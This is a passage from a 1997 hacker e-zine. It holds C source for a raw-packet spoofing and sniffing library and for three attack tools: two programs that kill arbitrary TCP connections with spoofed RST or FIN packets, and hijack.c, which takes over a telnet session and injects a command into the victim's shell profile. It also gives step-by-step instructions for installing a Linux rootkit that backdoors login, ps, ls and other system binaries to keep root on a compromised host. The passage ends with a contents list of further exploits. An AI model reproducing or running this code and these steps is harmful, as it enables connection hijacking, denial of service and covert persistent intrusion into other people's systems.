sendto(sp->fd, (char *)(sp->buffer), sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0, (struct sockaddr *)&sp_server,sizeof(struct sockaddr)); if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen) { if (sp_status < 0) perror("Sendto"), exit(1); printf("hmm... Only transmitted %d of %d bytes.\n", sp_status, sp->datalen+HEAD_BASE); }; #ifdef DEBUG printf("Packet transmitted...\n"); #endif } void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto) { struct IP_header *sp_help_ip; int HEAD_BASE; switch(proto) { case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */ case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */ default: exit(1); break; }; sp_help_ip = (struct IP_header *) (sp->buffer); sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4); sp_help_ip->type = 0; sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen); sp_help_ip->ID = htons(12545); /* TEST */ sp_help_ip->flag_offset = 0; sp_help_ip->TTL = 69; sp_help_ip->protocol = proto; sp_help_ip->source = sp_getaddrbyname(sp->source); sp_help_ip->destination = sp_getaddrbyname(sp->dest); sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer), IP_HEAD_BASE+sp->IP_optlen); #ifdef DEBUG printf("IP header fixed...\n"); #endif } void sp_fix_TCP_packet (struct sp_data_exchange *sp) { char sp_pseudo_ip_construct[MTU]; struct TCP_header *sp_help_tcp; struct pseudo_IP_header *sp_help_pseudo; int i; for(i=0;ibuffer+IP_HEAD_BASE+sp->IP_optlen); sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct; sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags); sp_help_tcp->seq_nr = htonl(sp->seq); sp_help_tcp->ACK_nr = htonl(sp->ack); sp_help_tcp->source = htons(sp->source_port); sp_help_tcp->destination = htons(sp->dest_port); sp_help_tcp->window = htons(0x7c00); /* dummy for now 'wujx' */ sp_help_pseudo->source = sp_getaddrbyname(sp->source); sp_help_pseudo->destination = sp_getaddrbyname(sp->dest); sp_help_pseudo->zero_byte = 0; sp_help_pseudo->protocol = 6; sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen); memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE); sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen); #ifdef DEBUG printf("TCP header fixed...\n"); #endif } void transmit_TCP (int sp_fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port, unsigned long sp_seq, unsigned long sp_ack, unsigned short sp_flags) { char sp_buffer[1500]; struct sp_data_exchange sp_struct; bzero(sp_buffer,1500); if (sp_ipoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen); if (sp_tcpoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen, sp_data+sp_ipoptlen,sp_tcpoptlen); if (sp_datalen!=0) memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen, sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen); sp_struct.fd = sp_fd; sp_struct.data = sp_data; sp_struct.datalen = sp_datalen; sp_struct.source = sp_source; sp_struct.source_port = sp_source_port; sp_struct.dest = sp_dest; sp_struct.dest_port = sp_dest_port; sp_struct.seq = sp_seq; sp_struct.ack = sp_ack; sp_struct.flags = sp_flags; sp_struct.buffer = sp_buffer; sp_struct.IP_optlen = sp_ipoptlen; sp_struct.TCP_optlen = sp_tcpoptlen; sp_fix_TCP_packet(&sp_struct); sp_fix_IP_packet(&sp_struct, 6); sp_send_packet(&sp_struct, 6); } void sp_fix_UDP_packet (struct sp_data_exchange *sp) { char sp_pseudo_ip_construct[MTU]; struct UDP_header *sp_help_udp; struct pseudo_IP_header *sp_help_pseudo; int i; for(i=0;ibuffer+IP_HEAD_BASE+sp->IP_optlen); sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct; sp_help_udp->source = htons(sp->source_port); sp_help_udp->destination = htons(sp->dest_port); sp_help_udp->length = htons(sp->datalen+UDP_HEAD_BASE); sp_help_pseudo->source = sp_getaddrbyname(sp->source); sp_help_pseudo->destination = sp_getaddrbyname(sp->dest); sp_help_pseudo->zero_byte = 0; sp_help_pseudo->protocol = 17; sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE); memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE); sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, sp->datalen+12+UDP_HEAD_BASE); #ifdef DEBUG printf("UDP header fixed...\n"); #endif } void transmit_UDP (int sp_fd, char *sp_data, int sp_ipoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port) { char sp_buffer[1500]; struct sp_data_exchange sp_struct; bzero(sp_buffer,1500); if (sp_ipoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen); if (sp_data!=NULL) memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen, sp_data+sp_ipoptlen,sp_datalen); sp_struct.fd = sp_fd; sp_struct.data = sp_data; sp_struct.datalen = sp_datalen; sp_struct.source = sp_source; sp_struct.source_port = sp_source_port; sp_struct.dest = sp_dest; sp_struct.dest_port = sp_dest_port; sp_struct.buffer = sp_buffer; sp_struct.IP_optlen = sp_ipoptlen; sp_struct.TCP_optlen = 0; sp_fix_UDP_packet(&sp_struct); sp_fix_IP_packet(&sp_struct, 17); sp_send_packet(&sp_struct, 17); } /* This routine stolen from ping.c -- HAHAHA!*/ unsigned short in_cksum(unsigned short *addr,int len) { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /************************* Receiving department ****************************/ int open_receiving (char *rc_device, char mode) { int or_fd; struct sigaction rc_sa; int fcntl_flag; struct ifreq ifinfo; char test; /* create snoop socket and set interface promisc */ if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1) perror("Couldn't open Socket."), exit(1); strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device); if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0) perror("Couldn't get flags."), exit(1); ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC; if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0) perror("Couldn't set flags. (PROMISC)"), exit(1); if(mode&IO_HANDLE) { /* install handler */ rc_sa.sa_handler=rc_sigio; /* we don't use signal() */ sigemptyset(&rc_sa.sa_mask); /* because the timing window is */ rc_sa.sa_flags=0; /* too big... */ sigaction(SIGIO,&rc_sa,NULL); } if(fcntl(or_fd,F_SETOWN,getpid())<0) perror("Couldn't set ownership"), exit(1); if(mode&IO_HANDLE) { if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0) perror("Couldn't get FLAGS"), exit(1); if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0) perror("Couldn't set FLAGS"), exit(1); rc_fd_abc123=or_fd; } else { if(mode&IO_NONBLOCK) { if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0) perror("Couldn't get FLAGS"), exit(1); if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0) perror("Couldn't set FLAGS"), exit(1); }; }; #ifdef DEBUG printf("Reading socket ready\n"); #endif return or_fd; } /* returns 0 when no packet read! */ int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned char *proto) { char help_buffer[MTU]; int pack_len; struct IP_header *gp_IPhead; pack_len = read(rc_fd,help_buffer,1500); if(pack_len<0) { if(errno==EWOULDBLOCK) {pack_len=0;} else {perror("Read error:"); exit(1);} }; if(pack_len>0) { pack_len -= DEV_PREFIX; memcpy(buffer,help_buffer+DEV_PREFIX,pack_len); gp_IPhead = (struct IP_header *) buffer; if(proto != NULL) *proto = gp_IPhead->protocol; if(TCP_UDP_start != NULL) *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2; } return pack_len; } void wait_packet_timeout (int sig) { alarm(0); WAIT_PACKET_WAIT_TIME=1; } int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, char *wp_source, unsigned short wp_source_port, char *wp_dest, unsigned short wp_dest_port, int wp_flags, int wait_time) { char wp_buffer[1500]; struct IP_header *wp_iphead; struct TCP_header *wp_tcphead; unsigned long wp_sourcel, wp_destl; int wp_tcpstart; char wp_proto; wp_sourcel=sp_getaddrbyname(wp_source); wp_destl=sp_getaddrbyname(wp_dest); WAIT_PACKET_WAIT_TIME=0; if(wait_time!=0) { signal(SIGALRM,wait_packet_timeout); alarm(wait_time); } while(1) { while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0) { if (WAIT_PACKET_WAIT_TIME!=0) {alarm(0); return -1;} }; if(wp_proto == 6) { wp_iphead= (struct IP_header *) wp_buffer; wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart); if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) ) { if( (ntohs(wp_tcphead->source)==wp_source_port) && (ntohs(wp_tcphead->destination)==wp_dest_port) ) { if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) ) { ret_values->seq=ntohl(wp_tcphead->seq_nr); ret_values->ack=ntohl(wp_tcphead->ACK_nr); ret_values->flags=ntohs(wp_tcphead->offset_flag)& (URG|ACK|PSH|FIN|RST|SYN); ret_values->datalen = ntohs(wp_iphead->length) - ((wp_iphead->verlen & 0xF) << 2) - ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10); alarm(0); return 0; } } } } } /*impossible to get here.. but anyways*/ alarm(0); return -1; } void close_receiving (void) { close(rc_fd_abc123); } void rc_sigio (int sig) /* Packet handling routine */ { char rc_buffer[1500]; char packet_id [50]; unsigned char *rc_so, *rc_dest; struct IP_header *rc_IPhead; struct TCP_header *rc_TCPhead; int pack_len; if(RC_FILTSET==0) return; if(SP_DATA_BUSY!=0) /* skip this packet */ return; pack_len = read(rc_fd_abc123,rc_buffer,1500); rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX); if(rc_IPhead->protocol!=6) return; /* if not TCP */ rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2)); rc_so = (unsigned char *) &(rc_IPhead->source); rc_dest = (unsigned char *) &(rc_IPhead->destination); sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source), rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination)); if(strcmp(packet_id,rc_filter_string)==0) { SP_DATA_BUSY=1; CUR_SEQ = ntohl(rc_TCPhead->seq_nr); CUR_ACK = ntohl(rc_TCPhead->ACK_nr); CUR_FLAGS = ntohs(rc_TCPhead->offset_flag); CUR_DATALEN = ntohs(rc_IPhead->length) - ((rc_IPhead->verlen & 0xF) << 2) - ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10); CUR_COUNT++; SP_DATA_BUSY=0; } } void set_filter (char *f_source, unsigned short f_source_port, char *f_dest, unsigned short f_dest_port) { unsigned char *f_so, *f_des; unsigned long f_sol, f_destl; RC_FILTSET=0; if(DEV_PREFIX==9999) fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1); f_sol = sp_getaddrbyname(f_source); f_destl = sp_getaddrbyname(f_dest); f_so = (unsigned char *) &f_sol; f_des = (unsigned char *) &f_destl; sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", f_so[0],f_so[1],f_so[2],f_so[3],f_source_port, f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port); RC_FILTSET=1; } ---=[ sniper-rst.c ]=--------------------------------------------------------- /**************************************************************************/ /* Sniper-rst - Example program on connection killing with IP spoofing */ /* Using the RST flag. */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - Killing any TCP connection on your subnet */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o sniper-rst sniper-rst.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" #define INTERFACE_PREFIX 14 char SOURCE[100],DEST[100]; int SOURCE_P,DEST_P; void main(int argc, char *argv[]) { int i,stat,j; int fd_send, fd_receive; unsigned long sp_ack, sp_seq; unsigned short flags; struct sp_wait_packet pinfo; if(argc != 5) { printf("usage: %s host1 port1 host2 port2\n",argv[0]); exit(0); } /* preparing some work */ DEV_PREFIX = INTERFACE_PREFIX; strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]); strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]); /* opening sending and receiving sockets */ fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */ printf("Trying to terminate the connection\n"); for(i=1;i<=100;i++) { /* Waiting for a packet containing an ACK */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5); if(stat==-1) {printf("Connection 5 secs idle or dead...\n");exit(1);} sp_seq=pinfo.ack; sp_ack=0; j=0; /* Sending our fake Packet */ /* for(j=0;j<10;j++) This would be better */ /* { */ transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P, sp_seq+j,sp_ack,RST); /* } */ /* waiting for confirmation */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5); if(stat<0) { printf("Connection 5 secs idle or dead...\n"); exit(0); } } printf("I did not succeed in killing it.\n"); } ---=[ sniper-fin.c ]=--------------------------------------------------------- /**************************************************************************/ /* Sniper-fin - Example program on connection killing with IP spoofing */ /* using the FIN flag. */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - Killing any TCP connection on your subnet */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o sniper-fin sniper-fin.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" #define INTERFACE_PREFIX 14 char SOURCE[100],DEST[100]; int SOURCE_P,DEST_P; void main(int argc, char *argv[]) { int i,stat; int fd_send, fd_receive; unsigned long sp_ack, sp_seq; unsigned short flags; struct sp_wait_packet pinfo; if(argc != 5) { printf("usage: %s host1 port1 host2 port2\n",argv[0]); exit(0); } /* preparing some work */ DEV_PREFIX = INTERFACE_PREFIX; strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]); strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]); /* opening sending and receiving sockets */ fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */ for(i=1;i<100;i++) { printf("Attack Sequence %d.\n",i); /* Waiting for a packet containing an ACK */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10); if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);} sp_seq=pinfo.ack; sp_ack=pinfo.seq+pinfo.datalen; /* Sending our fake Packet */ transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq,sp_ack,ACK|FIN); /* waiting for confirmation */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5); if(stat>=0) { printf("Killed the connection...\n"); exit(0); } printf("Hmmmm.... no response detected... (retry)\n"); } printf("I did not succeed in killing it.\n"); } ---=[ hijack.c ]=------------------------------------------------------------- /**************************************************************************/ /* Hijack - Example program on connection hijacking with IP spoofing */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - taking control of a running telnet session, and executing */ /* our own command in that shell. */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o hijack hijack.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* My spoofing include.... read licence on this */ /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" /* first ethernet device */ #define INTERFACE_PREFIX 14 /* 14 bytes is an ethernet header */ #define PERSONAL_TOUCH 666 int fd_receive, fd_send; char CLIENT[100],SERVER[100]; int CLIENT_P; void main(int argc, char *argv[]) { int i,j,count; struct sp_wait_packet attack_info; unsigned long sp_seq ,sp_ack; unsigned long old_seq ,old_ack; unsigned long serv_seq ,serv_ack; /* This data used to clean up the shell line */ char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a}; char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n"; if(argc!=4) { printf("Usage: %s client client_port server\n",argv[0]); exit(1); } strcpy(CLIENT,argv[1]); CLIENT_P=atoi(argv[2]); strcpy(SERVER,argv[3]); /* preparing all necessary sockets (sending + receiving) */ DEV_PREFIX = INTERFACE_PREFIX; fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, 0); /* normal BLOCKING mode */ printf("Starting Hijacking demo - Brecht Claerhout 1996\n"); printf("-----------------------------------------------\n"); for(j=0;j<50;j++) { printf("\nTakeover phase 1: Stealing connection.\n"); wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; printf(" Sending Spoofed clean-up data...\n"); transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23, sp_seq,sp_ack,ACK|PSH); /* NOTE: always beware you receive y'r OWN spoofed packs! */ /* so handle it if necessary */ count=0; printf(" Waiting for spoof to be confirmed...\n"); while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 1 unsuccesfully ended.\n");} else {printf("Phase 1 ended.\n"); break;}; }; printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n"); count=serv_seq=old_ack=0; while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; if(count!=PERSONAL_TOUCH) {printf("Phase 2 unsuccesfully ended.\n"); exit(0);} printf(" Server SEQ: %X (hex) ACK: %X (hex)\n",serv_seq,serv_ack); printf("Phase 2 ended.\n"); printf("\nTakeover phase 3: Sending MY data.\n"); printf(" Sending evil data.\n"); transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); count=0; printf(" Waiting for evil data to be confirmed...\n"); while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 3 unsuccesfully ended.\n"); exit(0);} printf("Phase 3 ended.\n"); } 2. Using LinuxRootKitIII : suid Rooting machines is just half the fun, the whole point to owning something is being able to keep root for as long as possible. To do this many kind people have released what are known as root kits. There are currently root kits available for a plethora of operating systems, e.g. Linux, SunOS, and FreeBSD. What a root kit does is installs many backdoored and trojanised programs to replace the existing programs which are used to perform the basic tasks of the host you owned. These tasks include: logging in, listing files, listing proccesses and so on. Focussing on a linux system, mainly because these are the most generally rooted by the masses. There are a few versions of the rootkit around. The main two you should have are LinuxRootKitIII, and LinuxRootKitII. You should have both 2, and 3 because they are for different kinds of linux machine. Generally, LinuxRootKitII (a.k.a lrk2) is for older Linux kernels (in the 1.x range) and LinuxRootKitIII (a.k.a lrk3) is for the newer Linux 2.x kernels. It should be noted somewhere in this article that you need to have owned (rooted) the machine _before_ you try and install rootkit, installing it as a non-root user wont work, and wont help you root the machine at all. Also it should be noted that you shouldn't 'test' lrk2/lrk3 on your own machine as it will probably just fuck you up. Ok, now comes the part I like. To use lrk2 or 3, you need a few things, a Linux box of the correct kernel version, root on that machine, and that machine needs to be able to compile. Once you have that its not a big problem. I'll take you thru it step by step. 1. Upload the lrk of the correct type. Remembering that its lrk2 for 1.x kernels and lrk3 for 2.x kernels. To find out what kernel the remote host is, type "uname -a" at the prompt, the number with the 2 radix points is the kernel version. Example: [root@sploitable root] # uname -a Linux sewid.org 2.0.29 #1 Sat Mar 22 17:39:12 EST 1997 i586 Ex1. This is a linux 2.0.29 kernel machine. Uploading the proper root kit can be easily done by ftp'ing to your remote machine and uploading it that way into some directory on a device with sufficient room to store lrk uncompressed. (Lrk3 is over 3mb uncompressed). To check how much space each device has, type df. 2. Untar/gzip it. This can easily be done by chdir'ing to wherever you uploaded it last step then executing the following command. [root@sploitable root] # tar -zxvf LRKIII.tar.gz 3. Make it. Linux root kits are quite user friendly provided the installation goes according to plan. To make the root kit, chdir to wherever it was untared to (e.g in lrk3, you would type "cd lrk3" from the directory you untarred it from.) and back up your existing binaries. To do this its best to know where they are. Here's a list of the binaries existing location on a common linux system. You should copy all these as shown. /bin/login /usr/bin/passwd /bin/ps /bin/ls /bin/netstat /usr/bin/du /usr/bin/top /usr/bin/rsh /sbin/ifconfig /usr/bin/chsh /usr/bin/chfn /usr/sbin/inetd If one of these files isnt on your system, or not in the directory mentioned above, try to find it using the 'whereis' command. Example: [root@sploitable lrk3] # whereis inetd inetd: /etc/inetd.conf /usr/lbin/inetd /usr/man/man8/inetd.8 Bingo you found inetd hiding in /usr/lbin I suggest copying all these to a directory called bin_bak or something under your lrk dir. Something like "cp /bin/ls ./bin_bak" for all of them is a good start. Ok now you've taken precautions, modify the rootkit.h file that is in the lrk directory. The minimum you should change is the default rootkit password: Example: #define ROOTKIT_PASSWORD "lrkr0x" Change this to... #define ROOTKIT_PASSWORD "code-0" Or anything you want that is *6 CHARACTERS LONG*. Ok thats it. Now your read to compile, this part is taken care of by the make file. All you need to do is type: "make all install" The make file takes all the source, compiles it, and places the new backdoored binaries into all the right places for you. It should be noted that once backdoored you should _NEVER_ attempt to change your rootkit password with the 'passwd' command. The root password is NOT THE SAME AS YOUR ROOTKIT PASSWORD. You may be able to log into the system by typing "root" at the login prompt then some password at the the password prompt, but this is a BACKDOOR, it does not mean the root password is the same as the one you put in rootkit.h. Happy Ownership. suid 1997. =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== Well, that was issue 1, hope ya'll liked it, don't forget to visit... ==================> http://www.codez.com UP FUCKEN NOW!@# <================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== And that ends everything, sorry if we spent a little to long straightening some shit out with sIn, but you deserve to know the truth... Until next time, when there will be 950 days until the year 2000... The CodeZero. =============================================================================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== =============================================================================== Remember, Mcdonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* crh002.txt100644 1751 12 257364 6355575560 10333 0ustar wheel =============================================================================== =--------------------=====================================--------------------= =--------------------= Status : Confidence Remains High. =--------------------= =--------------------= Issue : 002. =--------------------= =--------------------= Date : May 26th 1997. =--------------------= =--------------------=====================================--------------------= =============================================================================== =====================> http://www.codez.com NOW UP!@#* <===================== =============================================================================== .:. Site Of The Month .:. =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== In This HUUUUUUuuuUUUUUGE Issue : -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High Issue 2....................: Tetsu Khan 2. wh0 the King?......................................: so1o 3. www.codez.com......................................: fr1day -----=> Section B : Exploits And Code. 1. Unpatched Solaris 2.3 / 2.4 Exploit -=> solsuid.c.: Shawn Instenes 2. Pretty Useful Solaris 2.5.1 Exploit -=> ban251.c..: s0me Bugtraq d00d 3. Scan For php Vunerable Servers ------=> phpscan.c.: so1o 4. Use php.cgi To Get Files ------------=> phpget.c..: p1 5. Hiding From Who (incase you didn't read the pilots): so1o 6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1 7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith 8. Windoze NT / 95 Killer : winnuke.c.................: _eci -----=> Section C : Phones / Scanning / Radio. 1. Federal Bugging Frequencies........................: Weapon-X 2. 911 Autodialler Script.............................: dk 3. Cellular Calls Without Cloning.....................: TRON -----=> Section D : Miscellaneous. 1. Getting Your Exploits Onto Systems.................: so1o 2. Fakemailing Techniques.............................: so1o 3. Pascal Credit Card Generator Source................: Lobster Guacamole 4. in.courierd : backdoor on port 530.................: so1o 5. UK Laws On Computer Misuse.........................: Darkfool 6. so1o Gets Busted By CERT...........................: so1o 7. CERT Advisory CA-97.13 : xlock vunerablity.........: BugTraq 8. IRiX WWW Server Bugs...............................: Tetsu Khan 9. Hacking Not-So-Electrical Items....................: Tetsu Khan -----=> Section E : World News. 1. Amnesty International Hacked.......................: Article from cnet.com 2. //sToRm// Of sIn Rips Port Pro.....................: so1o 3. Digital Darkness Lives.............................: so1o 4. /home/sdr 0wned....................................: so1o 5. Sendmail 8.8.4 Remote Is Out.......................: so1o 6. sIn inf0z Part 2...................................: The CodeZero ------=> Section F : Projects. 1. The [C]odeZero [R]emote [A]ttack [K]it (CRAK.tar)..: so1o -----=> Section G : The End. =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ 